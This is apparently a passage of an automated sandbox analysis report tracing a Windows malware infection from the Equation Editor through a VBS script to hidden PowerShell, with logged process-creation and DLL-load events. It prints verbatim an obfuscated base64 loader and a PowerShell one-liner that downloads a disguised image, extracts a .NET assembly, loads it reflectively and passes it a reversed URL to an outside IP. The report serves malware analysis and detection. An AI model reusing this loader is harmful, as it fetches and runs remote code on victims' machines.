?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhd
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhdJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
